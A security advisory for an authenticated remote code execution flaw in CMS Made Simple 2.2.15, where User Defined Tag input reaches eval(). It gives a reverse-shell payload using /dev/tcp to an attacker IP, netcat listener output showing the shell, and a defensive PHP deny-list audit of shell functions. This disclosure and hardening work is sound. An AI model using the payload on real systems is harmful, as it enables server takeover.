Vendor: CMS Made Simple
Author: Andrey Stoykov
CVSS: 9.8 (HIGH)
Type: Remote Code Execution
CWE: 78
Product Name: CMS Made Simple
Affected Version From: 2.2.15
Affected Version To: 2.2.15
Patch Exists: YES
Related CWE: N/A
CPE: 2.2.15
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Debian 10 LAMPP
Year: 2020

CMS Made Simple 2.2.15 – RCE (Authenticated)

The vulnerability is present in 'editusertag.php' at line #93, where user input is passed to the eval() PHP function.

Reproduction Steps:

1. Login as administrator user and navigate to Extensions->User Defined Tags
2. Add code with the payload of: exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");
3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved.

Mitigation:

Ensure that user input is properly sanitized and validated before it is passed to the eval() function.
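The mitigation above is stated only in general terms, and the vulnerable line quoted in the raw Exploit-DB data below concatenates the tag body straight into eval(). The following is an added example (not CMS Made Simple code and not the vendor's patch) of one way to put a validation gate in front of that eval(): the tag source is tokenized with PHP's own token_get_all(), shell-execution and dynamic-code constructs are flagged, and the tag is only compiled when nothing was flagged. The variable name $code follows the vulnerable line; DENIED_FUNCTIONS, auditUserTagCode() and compileUserTag() are names chosen here for illustration, and the two sample tag bodies at the bottom are constructed for the demonstration.

```php
<?php
// Added example, not CMS Made Simple code: a tokenizer-based gate that audits a
// User Defined Tag body before it is handed to eval(). Assumed names: the tag
// source is the string $code (as in the vulnerable line), and DENIED_FUNCTIONS
// is an illustrative deny-list chosen here, not a list taken from the project.
declare(strict_types=1);

const DENIED_FUNCTIONS = [
    'exec', 'shell_exec', 'system', 'passthru', 'proc_open', 'popen',
    'pcntl_exec', 'assert', 'create_function', 'call_user_func',
    'call_user_func_array',
];

/**
 * Return a list of findings for $code (an empty array means nothing was flagged).
 * token_get_all() is used instead of a regex so that case, whitespace and a
 * leading namespace separator (\exec) do not slip past the check.
 */
function auditUserTagCode(string $code): array
{
    $findings = [];
    // The tag body is PHP without an opening tag, exactly as eval() receives it.
    $tokens = token_get_all("<?php\n" . $code);
    foreach ($tokens as $tok) {
        if (!is_array($tok)) {
            // Single-character tokens: the backtick is PHP's shell-exec operator.
            if ($tok === '`') {
                $findings[] = 'backtick shell execution operator';
            }
            continue;
        }
        [$id, $text, $line] = $tok;
        $line -= 1; // compensate for the "<?php\n" prefix added above
        // eval/include/require are keywords with their own token ids.
        if (in_array($id, [T_EVAL, T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE], true)) {
            $findings[] = sprintf('%s on line %d', strtolower($text), $line);
            continue;
        }
        // Plain identifiers (PHP 7) or fully-qualified names (PHP 8: \exec).
        $isName = $id === T_STRING
            || (defined('T_NAME_FULLY_QUALIFIED') && $id === T_NAME_FULLY_QUALIFIED);
        if ($isName && in_array(strtolower(ltrim($text, '\\')), DENIED_FUNCTIONS, true)) {
            $findings[] = sprintf('call to %s() on line %d', ltrim($text, '\\'), $line);
        }
    }
    return $findings;
}

/**
 * Hardened counterpart of the vulnerable line: refuse to compile a tag that
 * fails the audit. Since PHP 7 a syntax error in eval() throws ParseError rather
 * than returning FALSE, so callers should catch that as well.
 */
function compileUserTag(string $code): Closure
{
    $findings = auditUserTagCode($code);
    if ($findings !== []) {
        throw new InvalidArgumentException('tag rejected: ' . implode('; ', $findings));
    }
    return eval('return function () {' . "\n" . $code . "\n};");
}

// Constructed sample tag bodies for the demonstration (not from the advisory).
$samples = [
    'benign' => "return 'Generated on ' . date('Y-m-d');",
    'shell'  => "exec('id', \$out);\nreturn implode(PHP_EOL, \$out);",
];

foreach ($samples as $label => $body) {
    try {
        $tag = compileUserTag($body);
        echo $label, ': accepted, output = ', $tag(), "\n";
    } catch (InvalidArgumentException $e) {
        echo $label, ': ', $e->getMessage(), "\n";
    }
}
```

Treat a source-level check like this as a guardrail rather than a boundary: an account that is allowed to author arbitrary PHP can still reach the interpreter in ways a static deny-list does not see. The stronger controls are to keep User Defined Tag creation limited to trusted administrator accounts, to log and review changes to stored tags, and to disable shell-execution functions process-wide with the disable_functions directive in php.ini so that exec() and friends are unavailable regardless of what reaches eval().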

Exploit-DB raw data:

# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html

The vulnerability is present in "editusertag.php" at line #93, where user input is passed to the eval() PHP function.

// Vulnerable eval() code

if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

Reproduction Steps:

1. Login as administrator user and navigate to Extensions->User Defined Tags

2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");

3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 192.168.56.132 53690
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)